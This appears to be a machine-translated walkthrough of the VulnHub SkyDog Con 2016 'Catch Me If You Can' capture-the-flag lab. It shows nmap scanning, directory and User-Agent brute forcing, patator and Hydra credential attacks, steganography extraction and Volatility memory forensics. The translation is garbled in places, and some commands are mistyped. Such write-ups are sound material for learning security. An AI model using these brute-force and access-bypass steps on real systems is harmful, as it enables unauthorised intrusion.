VulnHub Analysis jobs CTF SkyDog: 2016 — Catch Me If You Can

Continue to parse the lab with VulnHub. This time we will analyze the decision CTF with the recent conference on information security SkyDog Con.

the

Start

Download the image for VirtualBox run as usual and check the output and nmap':

the

192.168.1.174 sudo nmap-sV-sC-p1-65535

Hidden text

Starting Nmap 7.01 ( nmap.org ) at 2016-12-18 19:39 MSK
Nmap scan report for 192.168.1.174
Host is up (0.00032 s latency).
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: SkyDog Con CTF 2016 — Catch Me If You Can
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=Network Solutions EV Server CA 2/organizationName=Network Solutions L. L. C./stateOrProvinceName=VA/countryName=US
| Not valid before: 2016-09-21T14:51:57
|_Not valid after: 2017-09-21T14:51:57
|_ssl-date: TLS randomness does not represent time
22222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b6:64:7c:d1:55:46:4e:50:e3:ba:cf:4c:1e:81:f9:db (RSA)
|_ 256 ef:17:df:cc:db:2e:c5:24:e3:9e:25:16:3d:25:68:35 (ECDSA)
MAC Address: 08:00:27:D3:70:74 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 — 4.1
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Us available 3 of the SSH port(22222), HTTP(80), HTTPS(443).

the

Flag#1 — "Don't go Home Frank! There's a Hex on Your House"

Judging from the description to the first flag, we need to look for something like the HEX sequence.

A cursory examination of the site gave no result, scan files and directories too, especially the situation hasn't been clarified:

the

sudo dirsearch -u http://192.168.1.174 -e php,txt,json,bak,html w /usr/share/dirb/wordlists/big.txt -r-f

Looking into the code of the main page we see the following:

the

</div>
<!--[if IE 8]> <html lang="en" class="ie8"> <![endif]-->
<!--[if IE 9]> <html lang="en" class="ie9"> <![endif]-->
<!--[If IE4]><script src="/oldIE/html5.js"></script><![Make sure to remove this before going to PROD]-->
<!--[if !IE]><!-->
<!-- Header -->

Hmm, strange, why do I need to remove that code before publishing. Take a look inside /oldIE/html5.js, we find that the HEX sequence mentioned in the description of the flag:



Decode and get the first flag: flag{7c0132070a0ef71d542663e9dc1f5dee}. This is the md5 from nmap.

the

Flag#2 — "Obscurity or Security? That is the Question"

Dirsearch gave us a 403 page, /personnel. Try to open it, in order to learn details, in return we get only the message:

ACCESS DENIED!!! You Do Not Appear To Be Coming From An FBI Workstation. Preparing Interrogation Room 1. Car Batteries Charging....

Try to change User-Agent in the query, we get the same result. Nikto here, we too did not help, as the hope that https is spinning a different version of the website. Assuming that the flag 1 was the clue, and again looking at the log, remember about non-standard ssh port. Connects there as root:

the

ssh root@192.168.1.174 -p 22222

Find the second flag: Flag{53c82eba31f6d416f331de9162ebe997}, in which the hash from the encrypt

the

Flag#3 — "During his Travels, Frank has Been Known to Intercept Traffic"

And so, we are talking about traffic interception, the previous flag, refers to the encryption. Not hard to guess that you need to look at a dump of the SSL traffic that goes when the page is loaded.
Run Wireshark, set the filter to display only packages from:

ip.addr == 192.168.1.174

Go to 192.168.1.174, and click on the links that are available to us, and then go to view of traffic:



Flag found: flag3{f82366a9ddc064585d54e3f78bde3221}, this is the hash from the personnel

PS As it turned out, the flag you could find just by looking in the browser in properties https certificate:

Hidden text

the

Flag#4 — "A Good Agent is Hard to Find"

From the third flag and the description, it should be that my initial assumption that the entrance to the /personnel requires true User-Agent was correct.

Download list all the User-Agent'ov. Next, using the following Python script run too much.

the

import requests
import sys

url = 'http://192.168.1.174/personnel'
ua_file = sys.argv[1]
head = {'User-Agent':"}
bad_resp = 'ACCESS DENIED!!! You Do Not Appear To Be Coming From An FBI Workstation. Preparing Interrogation Room 1. Car Batteries Charging....'

file = open(ua_file, 'r').read().splitlines()
for item in file:
head['User-Agent'] = item.strip()
req = requests.get(url, headers=head)
if req.text != bad_resp:
print('Found UA: %s' %(item))
print(req.text)

The result was not long in coming:

the List of matched User-Agent strings

Found / UA: Mozilla/4.0 (compatible; MSIE 4.01; AOL 4.0; Windows 98)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; AOL 4.0; Windows 95)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; AOL 4.0; Mac_68K)
Found UA: Mozilla/4.0 PPC (compatible; MSIE 4.01; Windows CE; PPC; 240x320; Sprint:PPC-6700; PPC; 240x320)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint;PPC-i830; PPC; 240x320)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint; SCH-i830; PPC; 240x320)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:SPH-ip830w; PPC; 240x320)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:SPH-ip320; Smartphone; 176x220)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:SCH-i830; PPC; 240x320)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:SCH-i320; Smartphone; 176x220)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:PPC-i830; PPC; 240x320)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone; 176x220)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320; Sprint:PPC-6700; PPC; 240x320)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320; PPC)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; Windows CE)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; Windows 98; Hotbar 3.0)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; Windows 98; DigExt)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)
Found UA: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)
Found UA: Mozilla/4.0 WebTV/2.6 (compatible; MSIE 4.0)
Found UA: Mozilla/4.0 (compatible; MSIE 4.0; Windows NT)
Found UA: Mozilla/4.0 (compatible; MSIE 4.0; Windows 98 )
Found UA: Mozilla/4.0 (compatible; MSIE 4.0; Windows 95; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Found UA: Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)
Found UA: Mozilla/4.0 (Compatible; MSIE 4.0)
Found UA: Mozilla/2.0 (compatible; MSIE 4.0; Windows 98)
Found UA: nuSearch Spider (compatible; MSIE 4.01; Windows NT)

Apparently the FBI only uses MSIE 4.0 :) After the change in the browser User-Agent and clicking on the link, get to the Portal to FBI agent Hanratty, and in the bottom of the page we see another flag:



md5online kindly reported that this hash from the evidence.

the

Flag#5 — "The Devil is in the Details — Or is it Dialogue? Either Way, if it's Simple, Guessable, or Personal it Goes Against Best Practices"

Next to the flag, can see another tip is newevidence. And from the description of the flag implies that you need to look for details.

In the eye catches the difference between the unsorted and sorted lists, as well as a few details, gathered all in a heap, we get the following list:

Manhattan
Heidelbery
Great American Masterpiece
Miami
July 16, 2009
617468
inconsequential
newevidence
Hanratty

After a long search on these key words, you can stumble on link. Having looked through it we find:

Agent Carl Hanratty — the hero of the work
Catch Me If You Can — book
Miami — scene 17 movie
Heidelberg printing machine from the movie

Continue scoring this list to a file and running a brute force directories and files find something interesting:



Well we found the authorization form! We have a user: Carl Hanratty, from the name of the flag we can assume that the password is something simple — personal information.

Proceed to overkill. Sgeneric dictionary of likely usernames run patator, we feed him a set of dictionaries SecLists

the

for item in $(find SecLists/ -name "*\.txt"); do sudo patator http_fuzz url=http://192.168.1.174/newevidence auth_type=basic accept_cookie=1 follow=1-x ignore:code=401 header='User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)' user_pass="FILE0:FILE1" 0=logins.txt 1=$item; done

INFO — 200 1462:676 0.011 | carl.hanratty:Grace | 37586 | HTTP/1.1 200 OK

P. S. Detailed studying film or book, it becomes clear that grace is the daughter of Charles.

After logging in get to the page:


And clicking on one of the links, find the flag: flag{117c240d49f54096413dd64280399ea9}. After decoding the received word: panam

the

Flag#6 — "Where in the World is Frank?"

"Where's Frank?" hmm... Returning to the site see the link Possible Location, by clicking which, we open the picture:

Hidden text

The picture is rather extensive, which suggests, that in it there is something else

the

sudo binwalk image.jpg

In the picture we have a MyISAM index file on 2Mb. Online you can find description the format of this file. After examining it, we understand that indexes MySQL cannot contain the required us flag. Further assuming that we are dealing with steganography, look at the output steghide.

After executing the command, we get the password prompt.

the

steghide info image.jpg

Hmm, interesting, try to type panam get this output:

"image.jpg":
format: jpeg
capacity: 230,1 KB
Try to get information about embedded data? (y/n) y
Enter passphrase:
embedded file "flag.txt":
size: 71.0 per Byte
encrypted: rijndael-128, cbc
compressed: yes

Extract the file in the file find the next flag flag{d1e5146b171928731385eb7ea38c37b8} and a new prompt: clue=iheartbrenda

the

Flag#7 — "Frank Was Caught on Camera Cashing Checks and Yelling — I'm The Fastest Man Alive!"

Zaguglit description of the flag, you can find a reference to the TV series FLASH and looking at wiki learn:

Spoiler for the film

Frank calls him, attempting to apologize for duping Carl. Carl rejects his apology and tells him he will soon be caught, but laughs when he realizes Frank actually called him because he has no one else to talk to. Frank hangs up, and Carl continues to investigate, suddenly realizing (thanks to a waiter) that the name "Barry Allen" is from the Flash comic books and that Frank is actually a teenager.

Frank, meanwhile, has expanded his con to include the identities of doctor and lawyer. While playing Dr. Frank Conners, he falls in love with Brenda (Amy Adams).

But what can these clues mean? Remembering the forgotten at the beginning of the ssh. All at once started to fit together. We have 2 phrase iheartbrenda and ILoveFrance, and some new names:

Generik dictionary

Give the script a pair of FirstName LastName

Frank Conners
Barry Allen
Carl Hanratty

the

#!/bin/bash
import sys

def Usage():
print('Usage: ./NtoL.py [namelist]')
exit(0)

if len(sys.argv) <= 1: Usage()
nameList = open(sys.argv[1]).read().splitlines()
out = open(sys.argv[1], 'w')
for item in nameList:
item = item.split(' ')
out.write( '%s%s\n' %(item[0], item[1]) )
out.write( '%s.%s\n' %(item[0], item[1]) )
out.write( '%s%s\n' %(item[0][0], item[1]) )
out.write( '%s.%s\n' %(item[0][0], item[1]) )
out.write( ('%s%s\n' %(item[0], item[1])).lower() )
out.write( ('%s.%s\n' %(item[0], item[1])).lower() )
out.write( ('%s%s\n' %(item[0][0], item[1])).lower() )
out.write( ('%s.%s\n' %(item[0][0], item[1])).lower() )
out.close()

The output is a dictionary to iterate through logins:

CarlHanratty
Carl.Hanratty
CHanratty
C. Hanratty
carlhanratty
carl.hanratty
chanratty
c.hanratty
BarryAllen
Barry.Allen
BAllen
B. Allen
barryallen
barry.allen
ballen
b.allen
FrankConners
Frank.Conners
FConners
F. Conners
frankconners
frank.conners
fconners
f.conners

Ship all in Hydra and the results are not long to wait:
the

hydra-L logins.txt -P flag7pwd ssh://192.168.1.174 -s 22222

We enter and immediately we find the flag:



After decoding the flag, we get: theflash

the

Flag#8 — "Franks Lost His Mind or Maybe it's His Memory. He's Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!"

In the same directory where we found the flag, there is a suspicious file: security-system.data
Downloaded it, for further analysis:

the

scp-P 22222 barryallen@192.168.1.174:~/security-system.data ./

And so we face the archive, unpack it:

the

$ file security-system.data

$ 7z x-oSS security-system.data
$ cd ./SS
$ ls
security-system.data
$ file security-system.data
security-system.data: data

The format is not defined, but the size of 1Gb. Binwalk any intelligible information is not given, so let's try volatility:

the

volatility -f security system.data imageinfo

Volatility Foundation Volatility Framework 2.5
INFO: volatility.debug: Determining profile based on KDBG search...
Suggested Profile(s): WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
AS Layer1: IA32PagedMemoryPae (Kernel AS)
AS Layer2: FileAddressSpace (/CTF/VulnHub/SkyDog2016/SS/security-system.data)
PAE type: PAE
DTB: 0x33e000L
KDBG: 0x80545b60L
Number of Processors: 1
Image Type (Service Pack): 3
KPCR for CPU 0: 0xffdff000L
KUSER_SHARED_DATA: 0xffdf0000L
Image date and time: 2016-10-10 22:00:50 UTC+0000
Image local date and time: 2016-10-10 18:00:50 -0400

Well, we have a memory dump OS WinXP. Let's start to extract from it useful information, and beginning with the module cmdline, as he was the first in the list, and the most interesting:

the

volatility -f security system.data --profile=WinXPSP2x86 cmdline

cmdline

Volatility Foundation Volatility Framework 2.5
************************************************************************
System pid: 4
************************************************************************
smss.exe pid: 332
Command line: \SystemRoot\System32\smss.exe
************************************************************************
csrss.exe pid: 560
Command line: C:\WINDOWS\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,3072,512 Windows=On SubSystemType=Windows ServerDll=basesrv DLL,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16
************************************************************************
winlogon.exe pid: 588
Command line: winlogon.exe
************************************************************************
services.exe pid: 664
Command line: C:\WINDOWS\system32\services.exe
************************************************************************
lsass.exe pid: 676
Command line: C:\WINDOWS\system32\lsass.exe
************************************************************************
vmacthlp.exe pid: 848
Command line: "C:\Program Files\VMware\VMware Tools\vmacthlp.exe"
************************************************************************
svchost.exe pid: 860
Command line: C:\WINDOWS\system32\svchost -k DcomLaunch
************************************************************************
svchost.exe pid: 944
Command line: C:\WINDOWS\system32\svchost -k rpcss
************************************************************************
svchost.exe pid: 1040
Command line: C:\WINDOWS\System32\svchost.exe -k netsvcs
************************************************************************
svchost.exe pid: 1092
Command line: C:\WINDOWS\system32\svchost.exe -k NetworkService
************************************************************************
svchost.exe pid: 1144
Command line: C:\WINDOWS\system32\svchost.exe -k LocalService
************************************************************************
explorer.exe pid: 1540
Command line: C:\WINDOWS\Explorer.EXE
************************************************************************
spoolsv.exe pid: 1636
Command line: C:\WINDOWS\system32\spoolsv.exe
************************************************************************
VGAuthService.e pid: 1900
Command line: "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
************************************************************************
vmtoolsd.exe pid: 2012
Command line: "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
************************************************************************
wmiprvse.exe pid: 488
Command line: C:\WINDOWS\system32\wbem\wmiprvse.exe
************************************************************************
wscntfy.exe pid: 536
Command line: C:\WINDOWS\system32\wscntfy.exe
************************************************************************
alg.exe pid: 624
Command line: C:\WINDOWS\System32\alg.exe
************************************************************************
vmtoolsd.exe pid: 1352
Command line: "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
************************************************************************
ctfmon.exe pid: 1356
Command line: "C:\WINDOWS\system32\ctfmon.exe"
************************************************************************
CCleaner.exe pid: 1388
Command line: "C:\Program Files\CCleaner\CCleaner.exe" /MONITOR
************************************************************************
cmd.exe pid: 1336
Command line: "C:\WINDOWS\system32\cmd.exe"
************************************************************************
wuauclt.exe pid: 1884
Command line: "C:\WINDOWS\system32\wuauclt.exe" /RunStoreAsComServer Local\[410]SUSDS4ea33fbaffc4ad40bbd1dc3ac93ee5cb
************************************************************************
wuauclt.exe pid: 1024
Command line: "C:\WINDOWS\system32\wuauclt.exe"
************************************************************************
notepad.exe pid: 268
Command line: "C:\WINDOWS\system32\NOTEPAD.EXE" C:\Documents and Settings\test\Desktop\code.txt
************************************************************************
cmd.exe pid: 1276

Last edited by the file code.txt. Running the following module cmdscan, we find another interesting entry:

the

volatility -f security system.data --profile=WinXPSP2x86 cmdscan

cmdscan

Volatility Foundation Volatility Framework 2.5
**************************************************
CommandProcess: csrss.exe Pid: 560
CommandHistory: 0x10186f8 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 2 LastAdded: 1 LastDisplayed: 1
ProcessHandle: 0x2d4
Cmd #0 @ 0x1024400: cd Desktop
Cmd #1 @ 0x4f2660: echo 66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d > code.txt

After decoding this HEX sequence, e.g., here, get the last flag:
flag{841dd3db29b0fbbd89c7b5be768cdc81}, in which hashed phrase: Two[space]little[space]mice

By running the command:

the

volatility -f security system.data --profile=WinXPSP2x86 notepad

It is possible to dump text from notepad, and make sure that it is necessary to us the flag:

notepad

Volatility Foundation Volatility Framework 2.5
Process: 268
Text:
?

Text:
d

Text:


Text:
?

Text:
66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d

CTF Passed!

Article based on information from habrahabr.ru